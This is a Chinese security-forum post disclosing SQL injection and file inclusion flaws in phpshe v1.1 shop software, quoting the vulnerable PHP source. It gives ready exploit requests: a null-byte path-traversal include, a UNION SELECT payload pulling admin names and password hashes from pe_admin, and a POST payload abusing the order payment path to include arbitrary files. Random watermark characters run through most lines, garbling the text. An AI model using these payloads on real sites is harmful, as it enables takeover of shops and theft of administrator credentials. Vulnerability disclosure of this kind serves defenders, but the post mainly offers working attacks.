找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2248|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-16 16:45:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/
; l- L0 r. v" l+ ~5 G/* Phpshe v1.1 Vulnerability
) g1 D& x' L. _. w4 a4 Z) K/* ========================5 v( S% X$ ^: p  N; R
/* By: : Kn1f3
. L: x9 l, v7 x1 x/* E-Mail : 681796@qq.com3 {) L2 I% V$ L  p
/*******************************************************/
  B3 I" U6 G; [2 Q4 z! T0×00 整体大概参数传输6 s! b4 b) v( L! ^2 B0 f/ ^3 x
- P. H: s, _. T

) `2 w1 V; q' {  s/ r" X6 p9 H

& j: ]! N* q- y; |) V* l9 N2 {7 j//common.php9 W5 L5 Z: c( J/ J2 e1 d3 h
if (get_magic_quotes_gpc()) {' J3 E) t: {( h+ Y2 d: D% P
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');: [( o& g/ b7 t* h0 I2 p
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
1 u; V2 H7 q" D' Y}
3 e& @! p2 }  |else {* M$ j+ g0 D8 p9 h8 ~# I4 t
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');* C) g. t/ e9 W* h9 O/ G3 l) x
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
+ P) ?8 u* {/ c}6 N2 {2 g. P0 D; t( i. K
session_start();
  b* \! `0 |2 u0 e!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');- w7 F  _2 h/ S* u% |6 J% g
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');" Y& {8 K; t8 `% ]

5 Z8 [) Q' T" D  E- Y( \6 v5 P0×01 包含漏洞
  k/ D4 I' w5 L% G2 y8 H1 y* K
/ T5 d! [1 Y# ]

5 Z5 c( W& P+ k! \3 @+ d//首页文件
4 s: R# m! q0 B& R+ Q# r<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
6 I3 }- t: q( T: [8 C6 g4 [include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞7 J/ B( S9 z$ B6 K
pe_result();
* N( o) [  P& J8 R6 i?>
6 ?1 i5 m! B+ `6 G- M9 ]9 ?//common 文件 第15行开始
9 U$ V  v6 G6 M0 Q0 P8 t, M8 ~$ u% Nurl路由配置- g1 i4 O' y3 {) C! K1 G
$module = $mod = $act = 'index';
1 y& r) z3 M( D+ d+ c) H9 o+ b1 w6 W$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);/ n+ E+ n  W1 }3 \- _6 A* F
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
" D$ B2 i# z" l$ W$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
+ P) v, g9 I2 `; B  N- F8 \. S//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%003 ^! f2 z' L& k! }


$ V9 c# j2 n' ~6 X # ~* y1 G$ c6 E% d, U9 c/ V8 V# r" L
0×02 搜索注入
5 O* R& b5 A. I, i; O2 q # L) v2 l$ q  b( k8 U+ n
<code id="code2">

//product.php文件
+ L# ]9 c6 q" p) `case 'list':/ I/ M  p0 {7 {7 R# i
$category_id = intval($id);) {* {( B* ?2 O( _! N
$info = $db->pe_select('category', array('category_id'=>$category_id));2 |8 ~# [/ u& K* T
//搜索
  `. @  j( ~7 h5 l* j6 ]$sqlwhere = " and `product_state` = 1";
% x/ n. U% E5 I" A$ H) ppe_lead('hook/category.hook.php');
& L) L9 d" `* `6 d$ P( `; |6 V7 ]if ($category_id) {
4 d# C' ^9 i, _where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";! J5 f0 A' b8 t- s; y
}
) W2 Z" W$ Y( _/ h$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤+ j& i$ J0 B. }! Y# `/ r
if ($_g_orderby) {
# K, n4 E- t! R, m" h$orderby = explode('_', $_g_orderby);
! Z8 N, F" d7 }+ r* S+ V' i3 W$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
, d% Q2 y2 n/ G* R+ y. Q2 r9 P" V/ f}
+ I, U$ ^! Z; s* [else {
4 d) S9 g6 f( q4 M8 O' T& t. Y$ l$sqlwhere .= " order by `product_id` desc";
( n0 x7 m: w( S3 G  g}5 W. @6 L5 S  S6 k% e" G/ Z
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));; k2 E; q1 l2 R0 y; E, T1 w5 S. ]1 I
//热卖排行* K+ Z- p: I, W0 {2 g' E
$product_hotlist = product_hotlist();
8 r6 y, S" x. i& N2 u9 \! n//当前路径
/ v8 A2 |: ~% Z. K* |. X$nowpath = category_path($category_id);" A7 b  O5 J- `7 C
$seo = pe_seo($info['category_name']);. B1 t5 a, n9 }7 t, E; v: g$ p
include(pe_tpl('product_list.html'));
9 u8 O0 _/ C$ \. x1 p//跟进selectall函数库
; a- s% P9 H3 U- K. ~$ E# Cpublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array()), A* p! I$ G& Z- u
{
8 F+ k8 U' h0 y& t8 z& I//处理条件语句
/ m7 D$ E4 T8 G4 Q$sqlwhere = $this->_dowhere($where);
0 T2 u) S/ r8 X( A4 X0 D6 O4 ]* Mreturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
/ [. D% H2 \' g( j/ i9 H/ Z9 ^- D. L* E}
" u% D1 Y( F. l5 f3 @# u# J//exp
5 G3 |- Z% Y) H- Qproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
6 D$ F  A1 l% Y/ {2 u) n% L, h0 J* Q5 Y

</code>1 M  o0 H3 W7 h

1 f5 K" ~  L* V! l! {8 l0×03 包含漏洞20 E9 s0 H( ^/ [

' T! m9 S& O# Z5 p, l<code id="code3">

//order.php

case 'pay':


% G4 ]8 q5 |( I& t+ p$order_id = pe_dbhold($_g_id);


# s: S% j* Z8 j' f7 R9 E( t- ]$cache_payway = cache::get('payway');


( n/ u( B, h6 X. Bforeach($cache_payway as $k => $v) {


, y9 d4 o; v4 S9 j/ r$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


# @# ]; p/ G1 k$ mif ($k == 'bank') {

6 w. f9 j* z  J9 [: N" h
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


' Z7 }8 t; T7 w5 y& F}

% E* |3 K0 Q3 \7 n% |4 X" T$ g, v
}


8 o: m! ^1 H  }5 l9 z% s/ c9 I$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


+ v3 z2 P# R/ K!$order['order_id'] && pe_error('订单号错误...');

3 S# O& C8 A# o1 K. W( z% s$ g' K
if (isset($_p_pesubmit)) {


' m$ S/ |' e$ r% Tif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


3 q- Y4 Z( o% g3 L$ i. n$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

$ n5 K; E: f  H9 x& G$ E' A; p
foreach ($info_list as $v) {


# X5 s2 ~0 P1 t# U" Q1 u, K0 F  }$order['order_name'] .= "{$v['product_name']};";* K( f7 u* I# V( p0 D$ f1 Y

5 ]8 R3 K- Y) c! f+ M
}


0 m' y4 d( K- ~; R; _/ q- ^  `echo '正在为您连接支付网站,请稍后...';


. v( ?" e3 S: N+ C# M# ^& Oinclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


3 V) u+ e2 U6 t. @}//当一切准备好的时候就可以进行"鸡肋包含了"


  ~( f" u8 Y4 Z* aelse {


* ?( I7 e3 g; `! spe_error('支付错误...');

  h# i- C$ h1 ^8 k- f% ]
}

, O5 j- V* j4 |) L  w; W
}

& n1 Z  ]) J  E
$seo = pe_seo('选择支付方式');

4 P! C& E( U" h* i. r
include(pe_tpl('order_pay.html'));


4 Q1 M+ s3 o7 ?4 z' Z0 Abreak;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>8 h4 V. J) A  _8 D: R% _& ~8 j
http://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表